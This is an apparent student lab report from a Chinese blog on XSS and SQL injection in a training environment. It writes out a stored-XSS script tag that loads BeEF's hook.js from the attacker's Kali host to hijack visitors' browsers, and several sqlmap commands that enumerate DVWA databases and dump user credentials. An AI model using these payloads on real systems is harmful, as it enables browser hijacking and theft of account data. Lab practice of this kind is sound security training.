渗透实验三

于 2021-12-15 04:52:22 发布
阅读量226 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60411436/article/details/121943757
版权

2、实验内容、原理

XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。

SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。

Cookie是由服务器端生成,发送给User-Agent(一般是浏览器),浏览器会将Cookie的key/value保存到某个目录下的文本文件内,下次请求同一网站时就发送该Cookie给服务器(前提是浏览器设置为启用Cookie)。Cookie名称和值可以由服务器端开发自己定义,对于JSP而言也可以直接写入jsessionid,这样服务器可以知道该用户是否为合法用户以及是否需要重新登录等。

3、实验过程

XSS部分:利用Beef劫持被攻击者客户端浏览器

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞

1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞

2、Kali生成恶意代码

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板

<script src="http://Kali的IP地址:3000/hook.js"></script>

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页

 

5、回答问题:实验中XSS攻击属于哪种类型:存储型 XSS

SQL注入部分:DVWA+SQLmap+Mysql注入实战

1、注入点发现。首先肯定是要判断是否有注入漏洞。

在输入框输入1,返回

ID: 1

First name: admin

Surname: admin

返回正常;

再次输入1',报错,返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

此时可以断定有SQL注入漏洞。

http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;


2、枚举当前使用的数据库名称和用户名。

 

Sqlmap输出截图。

3、枚举数据库用户名和密码

你输入的命令:

sqlmap -u "http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd' --string="Surname" --users –password

4、枚举数据库

--dbs:枚举当前数据库

你输入的命令:

sqlmap -u "http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd' --string="Surname" -dbs

5.枚举数据库和指定数据库的数据表

-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表
你输入的命令:

sqlmap -u "http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd' --string="Surname" -D dvwa –tables

6.获取指定数据库和表中所有列的信息

-D:指定的数据库
-T:指定数据库中的数据表
–columns:获取列的信息
你输入的命令:

sqlmap -u “第二步的链接” --cookie=‘security=low;PHPSESSID=第二步得到的Value’ -D dvwa -T users --columns

7.枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列
–dump:存储数据表项
你输入的命令:

sqlmap -u "http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd' --string="Surname" -D dvwa -T users -C user,password –dump

查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)

 

4、实验总结:

本次实验相对前面还是有点难度的,实践起来对自己来说有点难度,需要继续练习继续实践xss实验中,环境准备即搭建留言薄网站花了很多的时间,在留言薄网站提交恶意代码这个步骤,也老是犯迷糊,。SQL注入实验中,指令老是输错,太粗心了。

m0_60411436
关注
渗透测试:xss
weixin_45754647的博客
05-27 163
一、 二、xss分类 1、反射型xss,经常发生在搜索 2、存储型xss,经常发生在留言板 3、 4、 5、 6、 7、
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
xss利用之kali神器beef
热门推荐
jiangliuzheng的专栏
07-14 3万+
1、beef基本配置 BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf 1、修改config.yaml 编辑 /usr/share/beef-xss/config.yaml metasploit: enable: false改为true 编辑 /usr/
第五次实验
weixin_33911824的博客
10-23 219
中国人民公安大学 Chinese people’public security university 网络对抗技术 实验报告 实验五 综合渗透 学生姓名 代翔 年级 2015 区队 六 指导教师 ...
脚踏实地小组的实验三
qq_46162550的博客
11-29 411
目录实验目的系统环境网络环境实验工具实验步骤XSS部分:利用Beef劫持被攻击者客户端浏览器SQL注入部分:DVWA+SQLmap+Mysql注入实战 实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境 Kali Linux 2、Windows Server 网络环境 交换网络结构 实验工具 Beef;AWVS(Acunetix Web Vu
1渗透试验.pdf
11-24
渗透试验】是一种重要的土工试验,用于评估土壤的渗透性,即土壤允许水通过的能力。渗透性是评价土体工程性质的关键指标,因为它直接影响土体的强度、变形和固结特性。渗透试验的主要目标是测定土壤的渗透系数k,...
三维应力场中煤渗透特性试验
07-14
在本研究中,采用电液伺服岩石力学试验系统对煤样进行了全应力应变渗透试验,从而分析了应力应变变化对煤样渗透特性的影响。此项研究具有重要的工程应用价值,尤其在煤矿安全和煤炭资源有效利用等方面。 首先,煤样...
MySQL数据库渗透及漏洞利用总结
05-09 4215
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
实验:XSS跨站脚本攻击原理与实践 总结记录
qq_34073852的博客
06-19 2890
111
XSS和SQL注入
m0_46701146的博客
12-19 1149
实验三XSS注入 XSS注入
21、网站渗透留言板注入漏洞的利用原理及防御实战
郭盛华的CSDN技术博客
10-14 5066
主讲老师:郭盛华 注入漏洞: 注入漏洞是因为字符过滤不严谨所造成的,可以得到管理员的账号密码等相关资料。 这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。 当我们想要测试某个站点时,一般会架上注入工具对其狂轰乱炸,这样做虽然有时能找到注入点,但还是有些盲目,我个人的看法是:如果有源码的话,就从源码入手,在源码中查找注入点。对于源码,有些朋友可能觉得很难,...
beef自动化攻击(5)
从来不在调
03-06 1098
环境metaspoit+beef.利用autorun自动7化攻击 时间就是胜利,在勾住浏览器那短短时间内,如何完成一次高质量攻击呢? 利用BEEF REST API和浏览器交互速度将会大大增强。 首先写一个自动脚本,检查是否有挂钩,然后自动利用模块攻击。 beef injection framework自带的 autorun就可以完成这个任务。首先适当编辑autorun.rb脚本 编辑如(下
kali中浏览器攻击架BeEF的使用
爱国小白帽
02-24 7833
BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,至今还在维护。是由ruby语言开发的专门针对浏览器攻击的架。这个架也属于cs的结构 实验环境: PHPstudy 火狐浏览器、IE DVWA靶场 kali 安装: 新版kali里面没有需要安装,命令如下: apt-get install beef-x...
网络渗透测试实验三 XSS和SQL注入
qq_50798384的博客
12-14 678
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。 角色
用HTML+PHP写一个留言板来进行XSS测试&学习 第三篇(简单的过滤标签功能实现&绕过)
JackholeLiu的博客
04-09 2366
这次我们要给前一篇文章写的简易“入库”留言板添加一个功能,实现初级的过滤 留言板代码请看:http://blog.csdn.net/qq_38219257/article/details/69808812 因为是功能示范,暂时就写一个过滤标签的简单方法 这次用到了PHP中的 过滤器 filter_var  期中的参数FILTER_CALLBACK可以自定义数组进行过滤,用户可以自
kali之beef的使用
whoim_i的博客
11-03 2万+
目录一、beef介绍二、kali下使用beef配置beef实际操作 一、beef介绍 BeeF是前欧美最流行的web架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值